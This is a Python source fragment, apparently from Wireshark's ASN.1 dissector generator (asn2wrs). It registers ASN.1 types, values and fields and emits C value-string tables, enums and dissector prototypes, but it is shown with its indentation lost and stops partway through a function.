def __init__(self, conform, output, indent = 0):
self.conform = conform
self.output = output
self.conform.ectx = self
self.output.ectx = self
self.encoding = 'per'
self.aligned = False
self.default_oid_variant = ''
self.default_opentype_variant = ''
self.default_containing_variant = '_pdu_new'
self.default_embedded_pdv_cb = None
self.default_external_type_cb = None
self.remove_prefix = None
self.srcdir = None
self.emitted_pdu = {}
self.module = {}
self.module_ord = []
self.all_type_attr = {}
self.all_tags = {}
self.all_vals = {}
def encp(self): # encoding protocol
encp = self.encoding
return encp
# Encoding
def Per(self): return self.encoding == 'per'
def Ber(self): return self.encoding == 'ber'
def Aligned(self): return self.aligned
def Unaligned(self): return not self.aligned
def NeedTags(self): return self.tag_opt or self.Ber()
def NAPI(self): return False # disable planned features
def Module(self): # current module name
return self.modules[-1][0]
def groups(self):
return self.group_by_prot or (self.conform.last_group > 0)
def dbg(self, d):
if (self.dbgopt.find(d) >= 0):
return True
else:
return False
def value_max(self, a, b):
if (a == 'MAX') or (b == 'MAX'): return 'MAX';
if a == 'MIN': return b;
if b == 'MIN': return a;
try:
if (int(a) > int(b)):
return a
else:
return b
except (ValueError, TypeError):
pass
return "MAX((%s),(%s))" % (a, b)
def value_min(self, a, b):
if (a == 'MIN') or (b == 'MIN'): return 'MIN';
if a == 'MAX': return b;
if b == 'MAX': return a;
try:
if (int(a) < int(b)):
return a
else:
return b
except (ValueError, TypeError):
pass
return "MIN((%s),(%s))" % (a, b)
def value_get_eth(self, val):
if isinstance(val, Value):
return val.to_str(self)
ethname = val
if val in self.value:
ethname = self.value[val]['ethname']
return ethname
def value_get_val(self, nm):
val = asn2c(nm)
if nm in self.value:
if self.value[nm]['import']:
v = self.get_val_from_all(nm, self.value[nm]['import'])
if v is None:
msg = 'Need value of imported value identifier %s from %s (%s)' % (nm, self.value[nm]['import'], self.value[nm]['proto'])
warnings.warn_explicit(msg, UserWarning, '', 0)
else:
val = v
else:
val = self.value[nm]['value']
if isinstance (val, Value):
val = val.to_str(self)
else:
msg = 'Need value of unknown value identifier %s' % (nm)
warnings.warn_explicit(msg, UserWarning, '', 0)
return val
def eth_get_type_attr(self, type):
#print "eth_get_type_attr(%s)" % (type)
types = [type]
while (not self.type[type]['import']):
val = self.type[type]['val']
#print val
ttype = type
while (val.type == 'TaggedType'):
val = val.val
ttype += '/' + UNTAG_TYPE_NAME
if (val.type != 'Type_Ref'):
if (type != ttype):
types.append(ttype)
break
type = val.val
types.append(type)
attr = {}
#print " ", types
while len(types):
t = types.pop()
if (self.type[t]['import']):
attr.update(self.type[t]['attr'])
attr.update(self.eth_get_type_attr_from_all(t, self.type[t]['import']))
elif (self.type[t]['val'].type == 'SelectionType'):
val = self.type[t]['val']
(ftype, display) = val.eth_ftype(self)
attr.update({ 'TYPE' : ftype, 'DISPLAY' : display,
'STRINGS' : val.eth_strings(), 'BITMASK' : '0' });
else:
attr.update(self.type[t]['attr'])
attr.update(self.eth_type[self.type[t]['ethname']]['attr'])
#print " ", attr
return attr
def eth_get_type_attr_from_all(self, type, module):
attr = {}
if module in self.all_type_attr and type in self.all_type_attr[module]:
attr = self.all_type_attr[module][type]
return attr
def get_ttag_from_all(self, type, module):
ttag = None
if module in self.all_tags and type in self.all_tags[module]:
ttag = self.all_tags[module][type]
return ttag
def get_val_from_all(self, nm, module):
val = None
if module in self.all_vals and nm in self.all_vals[module]:
val = self.all_vals[module][nm]
return val
def get_obj_repr(self, ident, flds=[], not_flds=[]):
def set_type_fn(cls, field, fnfield):
obj[fnfield + '_fn'] = 'NULL'
obj[fnfield + '_pdu'] = 'NULL'
if field in val and isinstance(val[field], Type_Ref):
p = val[field].eth_type_default_pars(self, '')
obj[fnfield + '_fn'] = p['TYPE_REF_FN']
obj[fnfield + '_fn'] = obj[fnfield + '_fn'] % p # one iteration
if (self.conform.check_item('PDU', cls + '.' + field)):
obj[fnfield + '_pdu'] = 'dissect_' + self.field[val[field].val]['ethname']
return
# end of get_type_fn()
obj = { '_name' : ident, '_ident' : asn2c(ident)}
obj['_class'] = self.oassign[ident].cls
obj['_module'] = self.oassign[ident].module
val = self.oassign[ident].val
for f in flds:
if f not in val:
return None
for f in not_flds:
if f in val:
return None
for f in list(val.keys()):
if isinstance(val[f], Node):
obj[f] = val[f].fld_obj_repr(self)
else:
obj[f] = str(val[f])
if (obj['_class'] == 'TYPE-IDENTIFIER') or (obj['_class'] == 'ABSTRACT-SYNTAX'):
set_type_fn(obj['_class'], '&Type', '_type')
if (obj['_class'] == 'OPERATION'):
set_type_fn(obj['_class'], '&ArgumentType', '_argument')
set_type_fn(obj['_class'], '&ResultType', '_result')
if (obj['_class'] == 'ERROR'):
set_type_fn(obj['_class'], '&ParameterType', '_parameter')
return obj
#--- eth_reg_module -----------------------------------------------------------
def eth_reg_module(self, module):
#print "eth_reg_module(module='%s')" % (module)
name = module.get_name()
self.modules.append([name, module.get_proto(self)])
if name in self.module:
raise DuplicateError("module", name)
self.module[name] = []
self.module_ord.append(name)
#--- eth_module_dep_add ------------------------------------------------------------
def eth_module_dep_add(self, module, dep):
self.module[module].append(dep)
#--- eth_exports ------------------------------------------------------------
def eth_exports(self, exports):
self.exports_all = False
if ((len(exports) == 1) and (exports[0] == 'ALL')):
self.exports_all = True
return
for e in (exports):
if isinstance(e, Type_Ref):
self.exports.append(e.val)
elif isinstance(e, Class_Ref):
self.cexports.append(e.val)
else:
self.vexports.append(e)
#--- eth_reg_assign ---------------------------------------------------------
def eth_reg_assign(self, ident, val, virt=False):
#print "eth_reg_assign(ident='%s')" % (ident)
if ident in self.assign:
raise DuplicateError("assignment", ident)
self.assign[ident] = { 'val' : val , 'virt' : virt }
self.assign_ord.append(ident)
if (self.exports_all):
self.exports.append(ident)
#--- eth_reg_vassign --------------------------------------------------------
def eth_reg_vassign(self, vassign):
ident = vassign.ident
#print "eth_reg_vassign(ident='%s')" % (ident)
if ident in self.vassign:
raise DuplicateError("value assignment", ident)
self.vassign[ident] = vassign
self.vassign_ord.append(ident)
if (self.exports_all):
self.vexports.append(ident)
#--- eth_reg_oassign --------------------------------------------------------
def eth_reg_oassign(self, oassign):
ident = oassign.ident
#print "eth_reg_oassign(ident='%s')" % (ident)
if ident in self.oassign:
if self.oassign[ident] == oassign:
return # OK - already defined
else:
raise DuplicateError("information object assignment", ident)
self.oassign[ident] = oassign
self.oassign_ord.append(ident)
self.oassign_cls.setdefault(oassign.cls, []).append(ident)
#--- eth_import_type --------------------------------------------------------
def eth_import_type(self, ident, mod, proto):
#print "eth_import_type(ident='%s', mod='%s', prot='%s')" % (ident, mod, proto)
if ident in self.type:
#print "already defined '%s' import=%s, module=%s" % (ident, str(self.type[ident]['import']), self.type[ident].get('module', '-'))
if not self.type[ident]['import'] and (self.type[ident]['module'] == mod) :
return # OK - already defined
elif self.type[ident]['import'] and (self.type[ident]['import'] == mod) :
return # OK - already imported
else:
raise DuplicateError("type", ident)
self.type[ident] = {'import' : mod, 'proto' : proto,
'ethname' : '' }
self.type[ident]['attr'] = { 'TYPE' : 'FT_NONE', 'DISPLAY' : 'BASE_NONE',
'STRINGS' : 'NULL', 'BITMASK' : '0' }
mident = "$%s$%s" % (mod, ident)
if (self.conform.check_item('TYPE_ATTR', mident)):
self.type[ident]['attr'].update(self.conform.use_item('TYPE_ATTR', mident))
else:
self.type[ident]['attr'].update(self.conform.use_item('TYPE_ATTR', ident))
if (self.conform.check_item('IMPORT_TAG', mident)):
self.conform.copy_item('IMPORT_TAG', ident, mident)
self.type_imp.append(ident)
#--- dummy_import_type --------------------------------------------------------
def dummy_import_type(self, ident):
# dummy imported
if ident in self.type:
raise Exception("Try to dummy import for existing type :%s" % ident)
ethtype = asn2c(ident)
self.type[ident] = {'import' : 'xxx', 'proto' : 'xxx',
'ethname' : ethtype }
self.type[ident]['attr'] = { 'TYPE' : 'FT_NONE', 'DISPLAY' : 'BASE_NONE',
'STRINGS' : 'NULL', 'BITMASK' : '0' }
self.eth_type[ethtype] = { 'import' : 'xxx', 'proto' : 'xxx' , 'attr' : {}, 'ref' : []}
print("Dummy imported: %s (%s)" % (ident, ethtype))
return ethtype
#--- eth_import_class --------------------------------------------------------
def eth_import_class(self, ident, mod, proto):
#print "eth_import_class(ident='%s', mod='%s', prot='%s')" % (ident, mod, proto)
if ident in self.objectclass:
#print "already defined import=%s, module=%s" % (str(self.objectclass[ident]['import']), self.objectclass[ident]['module'])
if not self.objectclass[ident]['import'] and (self.objectclass[ident]['module'] == mod) :
return # OK - already defined
elif self.objectclass[ident]['import'] and (self.objectclass[ident]['import'] == mod) :
return # OK - already imported
else:
raise DuplicateError("object class", ident)
self.objectclass[ident] = {'import' : mod, 'proto' : proto,
'ethname' : '' }
self.objectclass_imp.append(ident)
#--- eth_import_value -------------------------------------------------------
def eth_import_value(self, ident, mod, proto):
#print "eth_import_value(ident='%s', mod='%s', prot='%s')" % (ident, mod, prot)
if ident in self.value:
#print "already defined import=%s, module=%s" % (str(self.value[ident]['import']), self.value[ident]['module'])
if not self.value[ident]['import'] and (self.value[ident]['module'] == mod) :
return # OK - already defined
elif self.value[ident]['import'] and (self.value[ident]['import'] == mod) :
return # OK - already imported
else:
raise DuplicateError("value", ident)
self.value[ident] = {'import' : mod, 'proto' : proto,
'ethname' : ''}
self.value_imp.append(ident)
#--- eth_sel_req ------------------------------------------------------------
def eth_sel_req(self, typ, sel):
key = typ + '.' + sel
if key not in self.sel_req:
self.sel_req[key] = { 'typ' : typ , 'sel' : sel}
self.sel_req_ord.append(key)
return key
#--- eth_comp_req ------------------------------------------------------------
def eth_comp_req(self, type):
self.comp_req_ord.append(type)
#--- eth_dep_add ------------------------------------------------------------
def eth_dep_add(self, type, dep):
if type not in self.type_dep:
self.type_dep[type] = []
self.type_dep[type].append(dep)
#--- eth_reg_type -----------------------------------------------------------
def eth_reg_type(self, ident, val):
#print "eth_reg_type(ident='%s', type='%s')" % (ident, val.type)
if ident in self.type:
if self.type[ident]['import'] and (self.type[ident]['import'] == self.Module()) :
# replace imported type
del self.type[ident]
self.type_imp.remove(ident)
else:
raise DuplicateError("type", ident)
val.ident = ident
self.type[ident] = { 'val' : val, 'import' : None }
self.type[ident]['module'] = self.Module()
self.type[ident]['proto'] = self.proto
if len(ident.split('/')) > 1:
self.type[ident]['tname'] = val.eth_tname()
else:
self.type[ident]['tname'] = asn2c(ident)
self.type[ident]['export'] = self.conform.use_item('EXPORTS', ident)
self.type[ident]['enum'] = self.conform.use_item('MAKE_ENUM', ident)
self.type[ident]['vals_ext'] = self.conform.use_item('USE_VALS_EXT', ident)
self.type[ident]['user_def'] = self.conform.use_item('USER_DEFINED', ident)
self.type[ident]['no_emit'] = self.conform.use_item('NO_EMIT', ident)
self.type[ident]['tname'] = self.conform.use_item('TYPE_RENAME', ident, val_dflt=self.type[ident]['tname'])
self.type[ident]['ethname'] = ''
if (val.type == 'Type_Ref') or (val.type == 'TaggedType') or (val.type == 'SelectionType') :
self.type[ident]['attr'] = {}
else:
(ftype, display) = val.eth_ftype(self)
self.type[ident]['attr'] = { 'TYPE' : ftype, 'DISPLAY' : display,
'STRINGS' : val.eth_strings(), 'BITMASK' : '0' }
self.type[ident]['attr'].update(self.conform.use_item('TYPE_ATTR', ident))
self.type_ord.append(ident)
# PDU
if (self.conform.check_item('PDU', ident)):
self.eth_reg_field(ident, ident, impl=val.HasImplicitTag(self), pdu=self.conform.use_item('PDU', ident))
#--- eth_reg_objectclass ----------------------------------------------------------
def eth_reg_objectclass(self, ident, val):
#print "eth_reg_objectclass(ident='%s')" % (ident)
if ident in self.objectclass:
if self.objectclass[ident]['import'] and (self.objectclass[ident]['import'] == self.Module()) :
# replace imported object class
del self.objectclass[ident]
self.objectclass_imp.remove(ident)
elif isinstance(self.objectclass[ident]['val'], Class_Ref) and \
isinstance(val, Class_Ref) and \
(self.objectclass[ident]['val'].val == val.val):
pass # ignore duplicated CLASS1 ::= CLASS2
else:
raise DuplicateError("object class", ident)
self.objectclass[ident] = { 'import' : None, 'module' : self.Module(), 'proto' : self.proto }
self.objectclass[ident]['val'] = val
self.objectclass[ident]['export'] = self.conform.use_item('EXPORTS', ident)
self.objectclass_ord.append(ident)
#--- eth_reg_value ----------------------------------------------------------
def eth_reg_value(self, ident, type, value, ethname=None):
#print "eth_reg_value(ident='%s')" % (ident)
if ident in self.value:
if self.value[ident]['import'] and (self.value[ident]['import'] == self.Module()) :
# replace imported value
del self.value[ident]
self.value_imp.remove(ident)
elif ethname:
self.value[ident]['ethname'] = ethname
return
else:
raise DuplicateError("value", ident)
self.value[ident] = { 'import' : None, 'module' : self.Module(), 'proto' : self.proto,
'type' : type, 'value' : value,
'no_emit' : False }
self.value[ident]['export'] = self.conform.use_item('EXPORTS', ident)
self.value[ident]['ethname'] = ''
if (ethname): self.value[ident]['ethname'] = ethname
self.value_ord.append(ident)
#--- eth_reg_field ----------------------------------------------------------
def eth_reg_field(self, ident, type, idx='', parent=None, impl=False, pdu=None):
#print "eth_reg_field(ident='%s', type='%s')" % (ident, type)
if ident in self.field:
if pdu and (type == self.field[ident]['type']):
pass # OK already created PDU
else:
raise DuplicateError("field", ident)
self.field[ident] = {'type' : type, 'idx' : idx, 'impl' : impl, 'pdu' : pdu,
'modified' : '', 'attr' : {} }
name = ident.split('/')[-1]
if self.remove_prefix and name.startswith(self.remove_prefix):
name = name[len(self.remove_prefix):]
if len(ident.split('/')) > 1 and name == ITEM_FIELD_NAME: # Sequence/Set of type
if len(self.field[ident]['type'].split('/')) > 1:
self.field[ident]['attr']['NAME'] = '"%s item"' % ident.split('/')[-2]
self.field[ident]['attr']['ABBREV'] = asn2c(ident.split('/')[-2] + name)
else:
self.field[ident]['attr']['NAME'] = '"%s"' % self.field[ident]['type']
self.field[ident]['attr']['ABBREV'] = asn2c(self.field[ident]['type'])
else:
self.field[ident]['attr']['NAME'] = '"%s"' % name
self.field[ident]['attr']['ABBREV'] = asn2c(name)
if self.conform.check_item('FIELD_ATTR', ident):
self.field[ident]['modified'] = '#' + str(id(self))
self.field[ident]['attr'].update(self.conform.use_item('FIELD_ATTR', ident))
if (pdu):
self.field[ident]['pdu']['export'] = (self.conform.use_item('EXPORTS', ident + '_PDU') != 0)
self.pdu_ord.append(ident)
else:
self.field_ord.append(ident)
if parent:
self.eth_dep_add(parent, type)
def eth_dummy_eag_field_required(self):
if (not self.dummy_eag_field):
self.dummy_eag_field = 'eag_field'
#--- eth_clean --------------------------------------------------------------
def eth_clean(self):
self.proto = self.proto_opt;
#--- ASN.1 tables ----------------
self.assign = {}
self.assign_ord = []
self.field = {}
self.pdu_ord = []
self.field_ord = []
self.type = {}
self.type_ord = []
self.type_imp = []
self.type_dep = {}
self.sel_req = {}
self.sel_req_ord = []
self.comp_req_ord = []
self.vassign = {}
self.vassign_ord = []
self.value = {}
self.value_ord = []
self.value_imp = []
self.objectclass = {}
self.objectclass_ord = []
self.objectclass_imp = []
self.oassign = {}
self.oassign_ord = []
self.oassign_cls = {}
#--- Modules ------------
self.modules = []
self.exports_all = False
self.exports = []
self.cexports = []
self.vexports = []
#--- types -------------------
self.eth_type = {}
self.eth_type_ord = []
self.eth_export_ord = []
self.eth_type_dupl = {}
self.named_bit = []
#--- value dependencies -------------------
self.value_dep = {}
#--- values -------------------
self.eth_value = {}
self.eth_value_ord = []
#--- fields -------------------------
self.eth_hf = {}
self.eth_hf_ord = []
self.eth_hfpdu_ord = []
self.eth_hf_dupl = {}
self.dummy_eag_field = None
#--- type dependencies -------------------
self.eth_type_ord1 = []
self.eth_dep_cycle = []
self.dep_cycle_eth_type = {}
#--- value dependencies and export -------------------
self.eth_value_ord1 = []
self.eth_vexport_ord = []
#--- eth_prepare ------------------------------------------------------------
def eth_prepare(self):
self.eproto = asn2c(self.proto)
#--- dummy types/fields for PDU registration ---
nm = 'NULL'
if (self.conform.check_item('PDU', nm)):
self.eth_reg_type('_dummy/'+nm, NullType())
self.eth_reg_field(nm, '_dummy/'+nm, pdu=self.conform.use_item('PDU', nm))
#--- required PDUs ----------------------------
for t in self.type_ord:
pdu = self.type[t]['val'].eth_need_pdu(self)
if not pdu: continue
f = pdu['type']
pdu['reg'] = None
pdu['hidden'] = False
pdu['need_decl'] = True
if f not in self.field:
self.eth_reg_field(f, f, pdu=pdu)
#--- values -> named values -------------------
t_for_update = {}
for v in self.value_ord:
if (self.value[v]['type'].type == 'Type_Ref') or self.conform.check_item('ASSIGN_VALUE_TO_TYPE', v):
if self.conform.check_item('ASSIGN_VALUE_TO_TYPE', v):
tnm = self.conform.use_item('ASSIGN_VALUE_TO_TYPE', v)
else:
tnm = self.value[v]['type'].val
if tnm in self.type \
and not self.type[tnm]['import'] \
and (self.type[tnm]['val'].type == 'IntegerType'):
self.type[tnm]['val'].add_named_value(v, self.value[v]['value'])
self.value[v]['no_emit'] = True
t_for_update[tnm] = True
for t in list(t_for_update.keys()):
self.type[t]['attr']['STRINGS'] = self.type[t]['val'].eth_strings()
self.type[t]['attr'].update(self.conform.use_item('TYPE_ATTR', t))
#--- required components of ---------------------------
#print "self.comp_req_ord = ", self.comp_req_ord
for t in self.comp_req_ord:
self.type[t]['val'].eth_reg_sub(t, self, components_available=True)
#--- required selection types ---------------------------
#print "self.sel_req_ord = ", self.sel_req_ord
for t in self.sel_req_ord:
tt = self.sel_req[t]['typ']
if tt not in self.type:
self.dummy_import_type(t)
elif self.type[tt]['import']:
self.eth_import_type(t, self.type[tt]['import'], self.type[tt]['proto'])
else:
self.type[tt]['val'].sel_req(t, self.sel_req[t]['sel'], self)
#--- types -------------------
for t in self.type_imp: # imported types
nm = asn2c(t)
self.eth_type[nm] = { 'import' : self.type[t]['import'],
'proto' : asn2c(self.type[t]['proto']),
'attr' : {}, 'ref' : []}
self.eth_type[nm]['attr'].update(self.conform.use_item('ETYPE_ATTR', nm))
self.type[t]['ethname'] = nm
for t in self.type_ord: # dummy import for missing type reference
tp = self.type[t]['val']
#print "X : %s %s " % (t, tp.type)
if isinstance(tp, TaggedType):
#print "%s : %s " % (tp.type, t)
tp = tp.val
if isinstance(tp, Type_Ref):
#print "%s : %s ::= %s " % (tp.type, t, tp.val)
if tp.val not in self.type:
self.dummy_import_type(tp.val)
for t in self.type_ord:
nm = self.type[t]['tname']
if ((nm.find('#') >= 0) or
((len(t.split('/'))>1) and
(self.conform.get_fn_presence(t) or self.conform.check_item('FN_PARS', t) or
self.conform.get_fn_presence('/'.join((t,ITEM_FIELD_NAME))) or self.conform.check_item('FN_PARS', '/'.join((t,ITEM_FIELD_NAME)))) and
not self.conform.check_item('TYPE_RENAME', t))):
if len(t.split('/')) == 2 and t.split('/')[1] == ITEM_FIELD_NAME: # Sequence of type at the 1st level
nm = t.split('/')[0] + t.split('/')[1]
elif t.split('/')[-1] == ITEM_FIELD_NAME: # Sequence/Set of type at next levels
nm = 'T_' + self.conform.use_item('FIELD_RENAME', '/'.join(t.split('/')[0:-1]), val_dflt=t.split('/')[-2]) + t.split('/')[-1]
elif t.split('/')[-1] == UNTAG_TYPE_NAME: # Untagged type
nm = self.type['/'.join(t.split('/')[0:-1])]['ethname'] + '_U'
else:
nm = 'T_' + self.conform.use_item('FIELD_RENAME', t, val_dflt=t.split('/')[-1])
nm = asn2c(nm)
if nm in self.eth_type:
if nm in self.eth_type_dupl:
self.eth_type_dupl[nm].append(t)
else:
self.eth_type_dupl[nm] = [self.eth_type[nm]['ref'][0], t]
nm += '_%02d' % (len(self.eth_type_dupl[nm])-1)
if nm in self.eth_type:
self.eth_type[nm]['ref'].append(t)
else:
self.eth_type_ord.append(nm)
self.eth_type[nm] = { 'import' : None, 'proto' : self.eproto, 'export' : 0, 'enum' : 0, 'vals_ext' : 0,
'user_def' : EF_TYPE|EF_VALS, 'no_emit' : EF_TYPE|EF_VALS,
'val' : self.type[t]['val'],
'attr' : {}, 'ref' : [t]}
self.type[t]['ethname'] = nm
if (not self.eth_type[nm]['export'] and self.type[t]['export']): # new export
self.eth_export_ord.append(nm)
self.eth_type[nm]['export'] |= self.type[t]['export']
self.eth_type[nm]['enum'] |= self.type[t]['enum']
self.eth_type[nm]['vals_ext'] |= self.type[t]['vals_ext']
self.eth_type[nm]['user_def'] &= self.type[t]['user_def']
self.eth_type[nm]['no_emit'] &= self.type[t]['no_emit']
if self.type[t]['attr'].get('STRINGS') == '$$':
use_ext = self.type[t]['vals_ext']
if (use_ext):
self.eth_type[nm]['attr']['STRINGS'] = '&%s_ext' % (self.eth_vals_nm(nm))
else:
self.eth_type[nm]['attr']['STRINGS'] = 'VALS(%s)' % (self.eth_vals_nm(nm))
self.eth_type[nm]['attr'].update(self.conform.use_item('ETYPE_ATTR', nm))
for t in self.eth_type_ord:
bits = self.eth_type[t]['val'].eth_named_bits()
if (bits):
for (val, id) in bits:
self.named_bit.append({'name' : id, 'val' : val,
'ethname' : 'hf_%s_%s_%s' % (self.eproto, t, asn2c(id)),
'ftype' : 'FT_BOOLEAN', 'display' : '8',
'strings' : 'NULL',
'bitmask' : '0x'+('80','40','20','10','08','04','02','01')[val%8]})
if self.eth_type[t]['val'].eth_need_tree():
self.eth_type[t]['tree'] = "ett_%s_%s" % (self.eth_type[t]['proto'], t)
else:
self.eth_type[t]['tree'] = None
#--- register values from enums ------------
for t in self.eth_type_ord:
if (self.eth_type[t]['val'].eth_has_enum(t, self)):
self.eth_type[t]['val'].reg_enum_vals(t, self)
#--- value dependencies -------------------
for v in self.value_ord:
if isinstance (self.value[v]['value'], Value):
dep = self.value[v]['value'].get_dep()
else:
dep = self.value[v]['value']
if dep and dep in self.value:
self.value_dep.setdefault(v, []).append(dep)
#--- exports all necessary values
for v in self.value_ord:
if not self.value[v]['export']: continue
deparr = self.value_dep.get(v, [])
while deparr:
d = deparr.pop()
if not self.value[d]['import']:
if not self.value[d]['export']:
self.value[d]['export'] = EF_TYPE
deparr.extend(self.value_dep.get(d, []))
#--- values -------------------
for v in self.value_imp:
nm = asn2c(v)
self.eth_value[nm] = { 'import' : self.value[v]['import'],
'proto' : asn2c(self.value[v]['proto']),
'ref' : []}
self.value[v]['ethname'] = nm
for v in self.value_ord:
if (self.value[v]['ethname']):
continue
if (self.value[v]['no_emit']):
continue
nm = asn2c(v)
self.eth_value[nm] = { 'import' : None,
'proto' : asn2c(self.value[v]['proto']),
'export' : self.value[v]['export'], 'ref' : [v] }
self.eth_value[nm]['value'] = self.value[v]['value']
self.eth_value_ord.append(nm)
self.value[v]['ethname'] = nm
#--- fields -------------------------
for f in (self.pdu_ord + self.field_ord):
if len(f.split('/')) > 1 and f.split('/')[-1] == ITEM_FIELD_NAME: # Sequence/Set of type
nm = self.conform.use_item('FIELD_RENAME', '/'.join(f.split('/')[0:-1]), val_dflt=f.split('/')[-2]) + f.split('/')[-1]
else:
nm = f.split('/')[-1]
nm = self.conform.use_item('FIELD_RENAME', f, val_dflt=nm)
nm = asn2c(nm)
if (self.field[f]['pdu']):
nm += '_PDU'
if (not self.merge_modules or self.field[f]['pdu']['export']):
nm = self.eproto + '_' + nm
t = self.field[f]['type']
if t in self.type:
ethtype = self.type[t]['ethname']
else: # undefined type
ethtype = self.dummy_import_type(t)
ethtypemod = ethtype + self.field[f]['modified']
if nm in self.eth_hf:
if nm in self.eth_hf_dupl:
if ethtypemod in self.eth_hf_dupl[nm]:
nm = self.eth_hf_dupl[nm][ethtypemod]
self.eth_hf[nm]['ref'].append(f)
self.field[f]['ethname'] = nm
continue
else:
nmx = nm + ('_%02d' % (len(self.eth_hf_dupl[nm])))
self.eth_hf_dupl[nm][ethtype] = nmx
nm = nmx
else:
if (self.eth_hf[nm]['ethtype']+self.eth_hf[nm]['modified']) == ethtypemod:
self.eth_hf[nm]['ref'].append(f)
self.field[f]['ethname'] = nm
continue
else:
nmx = nm + '_01'
self.eth_hf_dupl[nm] = {self.eth_hf[nm]['ethtype']+self.eth_hf[nm]['modified'] : nm, \
ethtypemod : nmx}
nm = nmx
if (self.field[f]['pdu']):
self.eth_hfpdu_ord.append(nm)
else:
self.eth_hf_ord.append(nm)
fullname = 'hf_%s_%s' % (self.eproto, nm)
attr = self.eth_get_type_attr(self.field[f]['type']).copy()
attr.update(self.field[f]['attr'])
if (self.NAPI() and 'NAME' in attr):
attr['NAME'] += self.field[f]['idx']
attr.update(self.conform.use_item('EFIELD_ATTR', nm))
use_vals_ext = self.eth_type[ethtype].get('vals_ext')
if (use_vals_ext):
attr['DISPLAY'] += '|BASE_EXT_STRING'
self.eth_hf[nm] = {'fullname' : fullname, 'pdu' : self.field[f]['pdu'],
'ethtype' : ethtype, 'modified' : self.field[f]['modified'],
'attr' : attr.copy(),
'ref' : [f]}
self.field[f]['ethname'] = nm
if (self.dummy_eag_field):
# Prepending "dummy_" avoids matching checkhf.pl.
self.dummy_eag_field = 'dummy_hf_%s_%s' % (self.eproto, self.dummy_eag_field)
#--- type dependencies -------------------
(self.eth_type_ord1, self.eth_dep_cycle) = dependency_compute(self.type_ord, self.type_dep, map_fn = lambda t: self.type[t]['ethname'], ignore_fn = lambda t: self.type[t]['import'])
i = 0
while i < len(self.eth_dep_cycle):
t = self.type[self.eth_dep_cycle[i][0]]['ethname']
self.dep_cycle_eth_type.setdefault(t, []).append(i)
i += 1
#--- value dependencies and export -------------------
for v in self.eth_value_ord:
if self.eth_value[v]['export']:
self.eth_vexport_ord.append(v)
else:
self.eth_value_ord1.append(v)
#--- export tags, values, ... ---
for t in self.exports:
if t not in self.type:
continue
if self.type[t]['import']:
continue
m = self.type[t]['module']
if not self.Per():
if m not in self.all_tags:
self.all_tags[m] = {}
self.all_tags[m][t] = self.type[t]['val'].GetTTag(self)
if m not in self.all_type_attr:
self.all_type_attr[m] = {}
self.all_type_attr[m][t] = self.eth_get_type_attr(t).copy()
for v in self.vexports:
if v not in self.value:
continue
if self.value[v]['import']:
continue
m = self.value[v]['module']
if m not in self.all_vals:
self.all_vals[m] = {}
vv = self.value[v]['value']
if isinstance (vv, Value):
vv = vv.to_str(self)
self.all_vals[m][v] = vv
#--- eth_vals_nm ------------------------------------------------------------
def eth_vals_nm(self, tname):
out = ""
if (not self.eth_type[tname]['export'] & EF_NO_PROT):
out += "%s_" % (self.eproto)
out += "%s_vals" % (tname)
return out
#--- eth_vals ---------------------------------------------------------------
def eth_vals(self, tname, vals):
out = ""
has_enum = self.eth_type[tname]['enum'] & EF_ENUM
use_ext = self.eth_type[tname]['vals_ext']
if (use_ext):
vals.sort(key=lambda vals_entry: int(vals_entry[0]))
if (not self.eth_type[tname]['export'] & EF_VALS):
out += 'static '
if (self.eth_type[tname]['export'] & EF_VALS) and (self.eth_type[tname]['export'] & EF_TABLE):
out += 'static '
out += "const value_string %s[] = {\n" % (self.eth_vals_nm(tname))
for (val, id) in vals:
if (has_enum):
vval = self.eth_enum_item(tname, id)
else:
vval = val
out += ' { %3s, "%s" },\n' % (vval, id)
out += " { 0, NULL }\n};\n"
if (use_ext):
out += "\nstatic value_string_ext %s_ext = VALUE_STRING_EXT_INIT(%s);\n" % (self.eth_vals_nm(tname), self.eth_vals_nm(tname))
return out
#--- eth_enum_prefix ------------------------------------------------------------
def eth_enum_prefix(self, tname, type=False):
out = ""
if (self.eth_type[tname]['export'] & EF_ENUM):
no_prot = self.eth_type[tname]['export'] & EF_NO_PROT
else:
no_prot = self.eth_type[tname]['enum'] & EF_NO_PROT
if (not no_prot):
out += self.eproto
if ((not self.eth_type[tname]['enum'] & EF_NO_TYPE) or type):
if (out): out += '_'
out += tname
if (self.eth_type[tname]['enum'] & EF_UCASE):
out = out.upper()
if (out): out += '_'
return out
#--- eth_enum_nm ------------------------------------------------------------
def eth_enum_nm(self, tname):
out = self.eth_enum_prefix(tname, type=True)
out += "enum"
return out
#--- eth_enum_item ---------------------------------------------------------------
def eth_enum_item(self, tname, ident):
out = self.eth_enum_prefix(tname)
out += asn2c(ident)
if (self.eth_type[tname]['enum'] & EF_UCASE):
out = out.upper()
return out
#--- eth_enum ---------------------------------------------------------------
def eth_enum(self, tname, vals):
out = ""
if (self.eth_type[tname]['enum'] & EF_DEFINE):
out += "/* enumerated values for %s */\n" % (tname)
for (val, id) in vals:
out += '#define %-12s %3s\n' % (self.eth_enum_item(tname, id), val)
else:
out += "typedef enum _%s {\n" % (self.eth_enum_nm(tname))
first_line = 1
for (val, id) in vals:
if (first_line == 1):
first_line = 0
else:
out += ",\n"
out += ' %-12s = %3s' % (self.eth_enum_item(tname, id), val)
out += "\n} %s;\n" % (self.eth_enum_nm(tname))
return out
#--- eth_bits ---------------------------------------------------------------
def eth_bits(self, tname, bits):
out = ""
out += "static const "
out += "asn_namedbit %(TABLE)s[] = {\n"
for (val, id) in bits:
out += ' { %2d, &hf_%s_%s_%s, -1, -1, "%s", NULL },\n' % (val, self.eproto, tname, asn2c(id), id)
out += " { 0, NULL, 0, 0, NULL, NULL }\n};\n"
return out
#--- eth_type_fn_h ----------------------------------------------------------
def eth_type_fn_h(self, tname):
out = ""
if (not self.eth_type[tname]['export'] & EF_TYPE):
out += 'static '
out += "int "
if (self.Ber()):
out += "dissect_%s_%s(gboolean implicit_tag _U_, tvbuff_t *tvb _U_, int offset _U_, asn1_ctx_t *actx _U_, proto_tree *tree _U_, int hf_index _U_)" % (self.eth_type[tname]['proto'], tname)
elif (self.Per()):
out += "dissect_%s_%s(tvbuff_t *tvb _U_, int offset _U_, asn1_ctx_t *actx _U_, proto_tree *tree _U_, int hf_index _U_)" % (self.eth_type[tname]['proto'], tname)
out += ";\n"
return out
#--- eth_fn_call ------------------------------------------------------------
def eth_fn_call(self, fname, ret=None, indent=2, par=None):
out = indent * ' '
if (ret):
if (ret == 'return'):
out += 'return '
else:
out += ret + ' = '
out += fname + '('
ind = len(out)
for i in range(len(par)):
if (i>0): out += ind * ' '
